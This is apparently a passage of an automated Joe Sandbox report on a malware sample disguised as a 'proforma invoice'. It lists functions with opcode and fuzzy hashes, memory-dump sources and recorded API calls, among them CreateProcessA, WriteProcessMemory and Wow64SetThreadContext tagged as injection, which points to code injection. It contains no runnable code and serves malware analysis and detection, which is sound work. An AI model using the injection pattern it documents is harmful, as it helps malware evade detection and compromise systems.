Opcode ID: 7ca46c67b6fa7faaad06ca7b14bd694d231dd876fdf6ab3977b397db0c8b7474
Instruction ID: 4d8955db12719168512462e1329d33281d746d34fed649f6a9263f39e5c43a1a
Opcode Fuzzy Hash: 7ca46c67b6fa7faaad06ca7b14bd694d231dd876fdf6ab3977b397db0c8b7474
Instruction Fuzzy Hash: 6FE0C2367106244B83245E58A40A9AE77EADBC8161701C32AEC8E83780DE28AE0293E0

Function 015BBB00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4f1428c95e2836781e39bcae7d54b037adf3c3b447ad0edf9230f2c040df60
Instruction ID: c031de04caa00e71c96049c441c42b4e1858d8e61b31617d4232d172c2bf558a
Opcode Fuzzy Hash: dc4f1428c95e2836781e39bcae7d54b037adf3c3b447ad0edf9230f2c040df60
Instruction Fuzzy Hash: E0D05E35B11220178A1862FE645855EBBDBCBCE2623544439E60AC3380EC648C0256A2

Function 015BE028 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf663264b47eb70f9a2fa783a386995baf787b75a563139acb4c393cab35a080
Instruction ID: cca01068c8ede2ceb3d55021304acaf7b3f5359b450d963bcf5e8d35c01cb51c
Opcode Fuzzy Hash: cf663264b47eb70f9a2fa783a386995baf787b75a563139acb4c393cab35a080
Instruction Fuzzy Hash: C3D09737500B1F87EB20610CE4E23E9B399FBA1124F4CC3358008CEA02DBB9E842C2C0

Function 015BE8C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a990b545b435558b39f87913386531ec281d53c09a10d864772b50ccca3c0c32
Instruction ID: 5e131972edc41ef2798eac39b8dfbcdeb4e81149882337fcd4076491734c5613
Opcode Fuzzy Hash: a990b545b435558b39f87913386531ec281d53c09a10d864772b50ccca3c0c32
Instruction Fuzzy Hash: A8E09AB4E042199F8744DFA8C5819ADBBF4FB48210F1085A9D909D7311E7319A42CFD5

Function 015BDFF0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0d6ffcd0be0c1d1e70ceaa67b653fb266ebce23d88ee75a2d49036a9122743
Instruction ID: 9316201cac96a4a89a1376248eef160a59065931ad98124b60c5b19f4e392a12
Opcode Fuzzy Hash: 3c0d6ffcd0be0c1d1e70ceaa67b653fb266ebce23d88ee75a2d49036a9122743
Instruction Fuzzy Hash: 42E01270A0120DEFCB40DFA8E95655DB7B5FB85205B1089A9D809E7310DB356F009B91

Function 015B9EB0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0443011ea0ed024d6b838f4028dd76ed4e5378774a7beda8e085d000f99fdbfb
Instruction ID: 45b8cd059f4702f38833fc4cdd988db2f4f4f8f5e5473b0e841adba9c247a51f
Opcode Fuzzy Hash: 0443011ea0ed024d6b838f4028dd76ed4e5378774a7beda8e085d000f99fdbfb
Instruction Fuzzy Hash: DAD09E301497849FC3029B68D5659507BF4AE4750430A80D5D5598B673D612ED51C756

Function 015BE890 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828d4aa1c0603590c6c83c11cf95664491a9744f04a5c91a2bc64528ddde6fa1
Instruction ID: 350247053e90bca3b99ba2c7a68c5fde8a7222670d3c772b41008a72d29b8366
Opcode Fuzzy Hash: 828d4aa1c0603590c6c83c11cf95664491a9744f04a5c91a2bc64528ddde6fa1
Instruction Fuzzy Hash: D2D0223111134097D319E6789800441B39F8E8263030083EEE039476D08FA2AC82C794

Function 015B9F33 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f75ed088ff0087966ee6c2febc596c03182ba8970ce21040d5a40eb0c7a0aab
Instruction ID: cc5e2a453fe950fbcec8671df790a1bea8737d5762ce527ec4dd0e5cff93ae43
Opcode Fuzzy Hash: 8f75ed088ff0087966ee6c2febc596c03182ba8970ce21040d5a40eb0c7a0aab
Instruction Fuzzy Hash: F1C01231144244EFC701CBA8D5A69907BE8BF4A60830840D8EA0D8B332D622EC02CA82

Function 015BA1B1 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923ecbfb68616aa90c8267d3be06212e88d992892740c09b3449cfe91f404c28
Instruction ID: d23962e5ad63a83e50ea540c1a0fbfd18ae46ed11138a3b145e908a33dbe5546
Opcode Fuzzy Hash: 923ecbfb68616aa90c8267d3be06212e88d992892740c09b3449cfe91f404c28
Instruction Fuzzy Hash: 7CC0123281E381CFCB038B38E8280083FA0AB2321136880FAC080CE1A2E6294806CB16

Function 015B4370 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0beade6f2e0ff8e7c3bee15915c08447eb8ee2230669a52e6cbdf864fb9ba89f
Instruction ID: b85a4f98ffb3539d2e405d207a2ea68542c2111584536100c9d178ffa6ca1860
Opcode Fuzzy Hash: 0beade6f2e0ff8e7c3bee15915c08447eb8ee2230669a52e6cbdf864fb9ba89f
Instruction Fuzzy Hash: 0AB02B3BB04414CBCA301140F4102FCB320FB80521F000033E21B80041832401125241

Function 015B4363 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee9b40b39ee069baf277f1fee7cea3469ec68e7d5d4e802e0680ad574f00810
Instruction ID: bc8b2de4cc6247a475a6348cc048030a1fc072624ec04f1f397caaec140c2b79
Opcode Fuzzy Hash: fee9b40b39ee069baf277f1fee7cea3469ec68e7d5d4e802e0680ad574f00810
Instruction Fuzzy Hash: 59B0223BB088208BCA300280F8002FCB320EB80A22F000033E22BA008283288222A282

Function 015BD2A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e81e52f20eb349c050b09f079c111acc28059bcc1430563881e79e6d5e8c2bc
Instruction ID: 0a1a1c12ef554099881950701a2eb90d4338b98c05fafde9468a2ff2de934c9e
Opcode Fuzzy Hash: 2e81e52f20eb349c050b09f079c111acc28059bcc1430563881e79e6d5e8c2bc
Instruction Fuzzy Hash: D7B09B59D042D75ACB0563304840055B7616AD51003DB81D14A445B0198D5894424755

Function 015B9EC0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7122550ef6be2b12b487bf4a769bab0e6d5f7f823f961b57e232f007f32923
Instruction ID: 125f09b73ec0816a9a625ef1a7bfaf6955bcf3ba4afb52a88ebb4e86258ab455
Opcode Fuzzy Hash: 2b7122550ef6be2b12b487bf4a769bab0e6d5f7f823f961b57e232f007f32923
Instruction Fuzzy Hash: EEC09234280208CFC204DF5CD484C9077E8EF49A1931140D8E6098B332DB23FC42CA80

Function 015B1740 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f880acdf4a9950506e4d56533ffb3f0f0a17b4b8c8392a14c7fd8e5bc0b9c1f
Instruction ID: 918d0f41cc1df822553bd4f03af158aff5dab12dd631a94b17a79fafb334e8e3
Opcode Fuzzy Hash: 2f880acdf4a9950506e4d56533ffb3f0f0a17b4b8c8392a14c7fd8e5bc0b9c1f
Instruction Fuzzy Hash: 8BB0927840C3088F93A3AF9BB04A1103BECAA84A103418026940C83609D67010248FA0

Function 015BAF80 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb5ece4577864548db5715072840c64225e6b9517efda3d564949fcbdeb1dec
Instruction ID: 99590338cd10585c852e32141be8e8e20a44bca0f955bd89b759f2faf37a8475
Opcode Fuzzy Hash: 4eb5ece4577864548db5715072840c64225e6b9517efda3d564949fcbdeb1dec
Instruction Fuzzy Hash: FDA0220820838B03EC0E33388AC22BA02F2BBE33023C0CC320A020C800CCBCC000200B

Analysis Process: CGWlZD.exePID: 7140, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	222
Total number of Limit Nodes:	9

Executed Functions

Function 015433A8 Relevance: 1.6, Strings: 1, Instructions: 389
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Fz/0, xrefs: 015436BB

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID: Fz/0
API String ID: 0-4070063546
Opcode ID: 4fb99fbd394ce277271abc8c836d1b4f7042b0efb13ce42a8803acbc9aa72089
Instruction ID: 8e46fcc838bf350289c350b45d64302733a4dd8dfdb027a3e07a299460836137
Opcode Fuzzy Hash: 4fb99fbd394ce277271abc8c836d1b4f7042b0efb13ce42a8803acbc9aa72089
Instruction Fuzzy Hash: 8DF1BB70D05215DFCB94CFA4D5858EEFBB2FF89318B2984A9C001AB265D731DD42CBA5

Function 015434B8 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

Fz/0, xrefs: 015436BB

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID: Fz/0
API String ID: 0-4070063546
Opcode ID: 2b942187ba728649e73e8965a70b4c0710b6ec06ba76f31cdd2038b4f02c65f4
Instruction ID: e5de05697b443a2c631f6f902a362754778552baa20a3d13fcb973d91bc0e863
Opcode Fuzzy Hash: 2b942187ba728649e73e8965a70b4c0710b6ec06ba76f31cdd2038b4f02c65f4
Instruction Fuzzy Hash: 6DD116B4E05219DFCB44CFA5E5808DEFBB2FF88314B249559C506AB264D730EA42CFA4

Function 01549CF8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00e7423743cfb52206b6b776179f3585ea3659d66892e7e5866c3e1dda92d43
Instruction ID: 529d928b52cd75144494b9bc7c8b5a3c338ee032cdc10df3635eed5fb0c37aec
Opcode Fuzzy Hash: a00e7423743cfb52206b6b776179f3585ea3659d66892e7e5866c3e1dda92d43
Instruction Fuzzy Hash: 64D11EB4E05219DFCB58CFA9D94569EBBF2FF89300F10946AD80AAB364D7345942CF11

Function 01549CE8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de66dc782df7f9e6dbd223349046151f9dbe825e37dd1cdcde6df347fdb1749
Instruction ID: 9dfc6ef372ece7bb12784aa30667476ad5d945a0ac273152fbe73ae68ee01e76
Opcode Fuzzy Hash: 7de66dc782df7f9e6dbd223349046151f9dbe825e37dd1cdcde6df347fdb1749
Instruction Fuzzy Hash: 70D11DB4E01219DFCB58CFA9D94569EBBF2FF89300F10956AD80AAB364D7345942CF11

Function 015412D2 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540db7765d72cfc4a4075306c8c80d7d5f9c3dca92c171f3935097d76274526b
Instruction ID: 7e8d47fecbd9830251916539a3553ba5036c4e71ae85a75e831bd0ee80d4072a
Opcode Fuzzy Hash: 540db7765d72cfc4a4075306c8c80d7d5f9c3dca92c171f3935097d76274526b
Instruction Fuzzy Hash: 47A13770E016098FDB58CFA9C884AEEBBF2FF88304F24842AD515AB255D7319946CF54

Function 01549B84 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e40b4c89b418639d5564c8ab1b563e7ccbee5557557523ed81e37c50d4f8c9b
Instruction ID: eeaa8942e32719040f1195bde36f80ac247702623ea0e297e961e853a3730100
Opcode Fuzzy Hash: 5e40b4c89b418639d5564c8ab1b563e7ccbee5557557523ed81e37c50d4f8c9b
Instruction Fuzzy Hash: 1A9192B4E002189FDB54DFA9D9546EEBBF2FF88300F14806AE81AAB364DB355941CF51

Function 0154A33F Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed132667725cb189c5d96aea9bdc07afa1c166c2e189aae40f00a71a1a2b7dc7
Instruction ID: 2fdb478613efe5394001154176dbdd6d42c227602711cc3fb05ee84209b4a7d4
Opcode Fuzzy Hash: ed132667725cb189c5d96aea9bdc07afa1c166c2e189aae40f00a71a1a2b7dc7
Instruction Fuzzy Hash: 0991A2B4E002189FDB18DFA9D9546EEBBF2FF88300F14806AE809AB364DB355941CF51

Function 01541360 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2368a149820c2717079446e5bc1d514ac433dd6764b3870d6cbb8aa2379c431a
Instruction ID: 1b82bba63b4005ffc24d1d84a42f4e1ed1208efc4044b08c965ea933b31600ae
Opcode Fuzzy Hash: 2368a149820c2717079446e5bc1d514ac433dd6764b3870d6cbb8aa2379c431a
Instruction Fuzzy Hash: 6F81A274E006198FDB08CFAAD584A9EBBF2FF88304F24852AD519BB358D7706945CF54

Function 01541B8A Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f32955d6a7788fa328469c6b684fbd347afe839072a3a119e752cee2607b80b
Instruction ID: ec72dbc6f9d40deaf4ffd7c6e33247570d3eede453c91f57a541bd3e9802d506
Opcode Fuzzy Hash: 4f32955d6a7788fa328469c6b684fbd347afe839072a3a119e752cee2607b80b
Instruction Fuzzy Hash: 3C510A70E0560A8FDB08CFA5C9846AEFBF2FF89305F14D46AD415AB254D7349A418F98

Function 01540871 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51861699ad73d07d46973c2cfa1372d5757f242e23c65881fbeea1145981a80
Instruction ID: 667fd781668398efaed5d8ac359eace189d75c0d0c1527686b18f6a0ab466a9a
Opcode Fuzzy Hash: e51861699ad73d07d46973c2cfa1372d5757f242e23c65881fbeea1145981a80
Instruction Fuzzy Hash: 0B31C771E016188FEB58CF6BD94069EBBF3AFC8300F14C5AAD508AA264DB345A458F51

Function 01542530 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee73285a18c047d301a3bb2b8096f70db2966b55aee4a08d9ec537a9afcfe6e
Instruction ID: 329c089ec5b83ca58e6de4159e58c63c31be20c2c25511edd4f6aea6cf4155b5
Opcode Fuzzy Hash: 5ee73285a18c047d301a3bb2b8096f70db2966b55aee4a08d9ec537a9afcfe6e
Instruction Fuzzy Hash: E8312871E016188FDB18CFAAD8446DEBBF2BFC9310F14C06AD409AA368DB340A55CF50

Function 0A3765D5 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A376816

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e29759b470af30ba9f577453cf86b64b19b782f9e762271149d1d8b09ad2d5cb
Instruction ID: 95910c68ec00ebc3d2bc6701ef1b39c3ba6ac4b91d889ef889860b6c42f17df9
Opcode Fuzzy Hash: e29759b470af30ba9f577453cf86b64b19b782f9e762271149d1d8b09ad2d5cb
Instruction Fuzzy Hash: F7A14971D1071ADFEB24CF68C851BEDBBB2BF48304F1485A9E808A7250DB799985CF91

Function 0A3765E0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A376816

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f7ce29202e3b74bd37ee1d68e444af6bcfec55b306a5746e9561c70044e81741
Instruction ID: c5d8d1dce0536a55f9e1497bc756ab4781e63b7bef6dbccde7545d502979f6a9
Opcode Fuzzy Hash: f7ce29202e3b74bd37ee1d68e444af6bcfec55b306a5746e9561c70044e81741
Instruction Fuzzy Hash: C0915A71D1071ADFEB24CF68C851BEDBBB2BF48304F1485A9E808A7240DB799985CF91

Function 0A522AF0 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1427303086.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a520000_CGWlZD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 2a70d98e4e0aa6ebb8a982ce632fda28178046a6212ad02ccbc1cbf5de0baaf6
Instruction ID: 067350d6ef57c4db4f701d889574f1f2a9f1b05ceda2e683c6e5285035cd527e
Opcode Fuzzy Hash: 2a70d98e4e0aa6ebb8a982ce632fda28178046a6212ad02ccbc1cbf5de0baaf6
Instruction Fuzzy Hash: DF31AD768043599FDB12CFA9D800ADEBFF8FF49310F04845AE954A7261C3399855CFA1

Function 0A379412 Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e743bc7354a7530e1b5937dca3623ea4d5a8bb82a40d55c1440118949246c1a
Instruction ID: fee32e225f83062ae3ba401db7b4db37626ec712ba40e09473e1c81bb8b5ca76
Opcode Fuzzy Hash: 1e743bc7354a7530e1b5937dca3623ea4d5a8bb82a40d55c1440118949246c1a
Instruction Fuzzy Hash: 6021CFB2E002699FDF70DB65D8467FEBBF1AB88310F144699D541A7290DB396D40CBE0

Function 0A376350 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A3763E8

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4753bd6b671e930e5824d17d0099c2d9d1effa8f3561caffc0e7033042ce849b
Instruction ID: dd9766f8dc838bbdcecf27d8aa9d971ebfe7a1db225f1fee71d0d3877cc2e6a7
Opcode Fuzzy Hash: 4753bd6b671e930e5824d17d0099c2d9d1effa8f3561caffc0e7033042ce849b
Instruction Fuzzy Hash: FD2144719003499FDF10CFA9C881BEEBBF1FF48310F14842AE918A7250CB799954CB60

Function 0A376358 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A3763E8

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9f1ef58d70eb24c28f4b6e5419546ed866c1c4963e062ce10612095984a219f3
Instruction ID: 2b6ace61d7519142d2e13b4a3ddd85bd31b7a57b144fa975466ae6a43694dc40
Opcode Fuzzy Hash: 9f1ef58d70eb24c28f4b6e5419546ed866c1c4963e062ce10612095984a219f3
Instruction Fuzzy Hash: 9D2124B59103499FDB10CFAAC985BDEBBF5FF48310F10842AE918A7250D778A954CBA4

Function 0A375DB9 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A375E3E

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 69de7f29390618764764577f87c76795d1381a6b36541f9ae03f63d78a4c7fee
Instruction ID: a3e885e5e898d5d1afb8e52baad4ae325b77b96b6951255cf81a552a66b7c9ac
Opcode Fuzzy Hash: 69de7f29390618764764577f87c76795d1381a6b36541f9ae03f63d78a4c7fee
Instruction Fuzzy Hash: 96215771D103098FEB20CFAAC485BEEBBF4EF88314F14842AD459A7240C779A945CFA0

Function 0A376441 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A3764C8

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f7c125cfcf11bf96ef3723571298f9a4e795b2f3cda2f48a8507e12665423820
Instruction ID: 65297432362bdb07b3f2847cd8671905bc8919fa405889c7ab7232c7d208f22a
Opcode Fuzzy Hash: f7c125cfcf11bf96ef3723571298f9a4e795b2f3cda2f48a8507e12665423820
Instruction Fuzzy Hash: 6B2125B180021A8FDB10CFAAC885BEEBBF0FF48310F10882AE518A7240C7799955CB64

Function 0A376448 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A3764C8

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fc8fb847bf1722434561b7e9a3ece68cf3e5a018fa3a3cd1fab86e1a0d65a47b
Instruction ID: 87834463da72cc4f209e617ba9cc78c5e5a5859e2e6c55c92a3a473014df9eef
Opcode Fuzzy Hash: fc8fb847bf1722434561b7e9a3ece68cf3e5a018fa3a3cd1fab86e1a0d65a47b
Instruction Fuzzy Hash: 242148B1C003099FDB10CFAAC841BEEBBF4FF48310F10842AE518A7240D7789954CBA4

Function 0A375DC0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A375E3E

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

